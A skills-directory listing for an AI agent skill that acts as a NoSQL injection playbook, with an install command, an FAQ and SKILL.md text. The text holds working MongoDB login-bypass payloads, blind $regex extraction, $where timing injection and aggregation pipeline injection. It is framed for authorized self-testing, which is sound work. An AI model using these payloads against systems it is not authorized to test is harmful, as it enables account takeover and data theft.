Nosql Injection
Run structured NoSQL injection tests on MongoDB-style APIs and query DSLs when SQLi checklists miss operator-based auth bypass and data abuse.
Overview
NoSQL Injection is an agent skill for the Ship phase that provides an expert attack playbook for MongoDB operator injection, auth bypass, and related NoSQL logic abuse on JSON and DSL-backed APIs.
Install
npx skills add https://github.com/yaklang/hack-skills --skill nosql-injectionWhat is this skill?
- Contrasts SQL string breakout vs MongoDB operator injection ($gt, $ne, $regex)
- Login bypass payloads for JSON bodies and PHP-style array parameter injection
- Blind extraction, aggregation pipeline injection, and Redis/CouchDB-specific angles
- Expert playbook framing—commonly missed by SQL-only testers
- Structured attack vectors for flexible search filters and backend query DSLs
Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 2/3 security scanners passed (skills.sh audits).
What problem does it solve?
Your API uses document databases or JSON filters and you only test SQL patterns, so operator injection and login bypass risks stay invisible until abuse hits production.
Who is it for?
Indie backend devs self-pentesting MongoDB/JSON login and search routes before ship or during a focused security pass.
Skip if: Legal unauthorized testing of third-party systems, or apps with zero NoSQL/JSON query surfaces—use generic OWASP guides for SQL-only stacks.
When should I use this skill?
MongoDB-style operators, JSON query objects, flexible search filters, or backend query DSLs may allow data or logic abuse.
What do I get? / Deliverables
You get prioritized NoSQL injection test cases and bypass patterns to run against staging endpoints, informing fixes before release or bounty submission.
- Operator injection test matrix
- Documented bypass attempts and findings
- Remediation hints tied to query shape
Recommended Skills
Journey fit
Offensive security validation belongs in Ship → Security before production exposure of flexible JSON/query backends. Security subphase covers deliberate abuse testing of authentication and data APIs, not feature implementation.
How it compares
Operator-focused NoSQL playbook—not a SQL injection cheat sheet or automated DAST replacement.
Common Questions / FAQ
Who is nosql-injection for?
Builders and security-minded solo devs maintaining APIs backed by MongoDB-style stores or JSON query DSLs who need structured offensive test ideas.
When should I use nosql-injection?
Use in Ship → Security while hardening auth and search endpoints; also relevant in Operate → iterate after an incident suspicion on document-query APIs.
Is nosql-injection safe to install?
The skill describes attack techniques—use only on systems you own or are authorized to test; confirm source trust via the Security Audits panel on this page.
SKILL.md
READMESKILL.md - Nosql Injection
# SKILL: NoSQL Injection — Expert Attack Playbook > **AI LOAD INSTRUCTION**: NoSQL injection is fundamentally different from SQL injection. Covers MongoDB operator injection, authentication bypass, blind extraction, aggregation pipeline injection, and Redis/CouchDB specific attacks. Very commonly missed by testers who only know SQLi patterns. --- ## 1. CORE CONCEPT — OPERATOR INJECTION **SQL Injection** breaks out of string literals. **NoSQL Injection** injects **query operators** that change query logic. MongoDB example — normal query: ```javascript db.users.find({username: "alice", password: "secret"}) ``` Injection via JSON operator: ```json { "username": "admin", "password": {"$gt": ""} } ``` → Becomes: `find({username:"admin", password:{$gt:""}})` → password > "" → always true! --- ## 2. MONGODB — LOGIN BYPASS ### JSON Body Injection (API with JSON Content-Type) ```json POST /api/login Content-Type: application/json {"username": "admin", "password": {"$ne": "invalid"}} {"username": "admin", "password": {"$gt": ""}} {"username": {"$ne": "invalid"}, "password": {"$ne": "invalid"}} {"username": "admin", "password": {"$regex": ".*"}} ``` ### PHP `$_POST` Array Injection (URL-encoded form) ``` username=admin&password[$ne]=invalid username=admin&password[$gt]= username[$ne]=invalid&password[$ne]=invalid username=admin&password[$regex]=.* ``` ### Ruby / Python `params` Array Injection Same as PHP — use bracket notation to inject objects: ``` ?username[%24ne]=invalid&password[%24ne]=invalid ``` `%24` = URL-encoded `$` --- ## 3. MONGODB OPERATORS FOR INJECTION | Operator | Meaning | Use Case | |---|---|---| | `$ne` | not equal | `{"password": {"$ne": "x"}}` → always matches | | `$gt` | greater than | `{"password": {"$gt": ""}}` → all non-empty passwords match | | `$gte` | greater or equal | Similar to $gt | | `$lt` | less than | `{"password": {"$lt": "~"}}` → all ASCII match | | `$regex` | regex match | `{"username": {"$regex": "adm.*"}}` | | `$where` | JS expression | MOST DANGEROUS — code execution | | `$exists` | field exists | `{"admin": {"$exists": true}}` | | `$in` | in array | `{"username": {"$in": ["admin","user"]}}` | --- ## 4. BLIND DATA EXTRACTION VIA $REGEX Like binary search in SQLi, use `$regex` to extract field values character by character: ```json // Does admin's password start with 'a'? {"username": "admin", "password": {"$regex": "^a"}} // Does admin's password start with 'b'? {"username": "admin", "password": {"$regex": "^b"}} // Continue: narrow down each position {"username": "admin", "password": {"$regex": "^ab"}} {"username": "admin", "password": {"$regex": "^ac"}} ``` **Response difference**: successful login vs failed login = boolean oracle. **Automate** with NoSQLMap or custom script with binary search on character set. --- ## 5. MONGODB $WHERE INJECTION (JS EXECUTION) `$where` evaluates JavaScript in MongoDB context. **Can only use current document's fields** — not system access. But allows logic abuse: ```json {"$where": "this.username == 'admin' && this.password.length > 0"} // Blind extraction via timing: {"$where": "if(this.username=='admin'){sleep(5000);return true;}else{return false;}"} // Regex via JS: {"$where": "this.username.match(/^adm/) && true"} ``` **Limit**: `$where` doesn't give OS command execution — **server-side JS injection** (not to be confused with command injection). --- ## 6. AGGREGATION PIPELINE INJECTION When user-controlled data enters `$match` or `$group` stages: ```javascript // Vulnerable code: db.collection.aggregate([ {$match: {category: userInput}}, // userInput = {"$ne": null} ... ]) ``` Inject operators to bypass: ```json // Input as object: {"$ne": null} → matches all categories {"$regex": ".*"} → matches all ``` -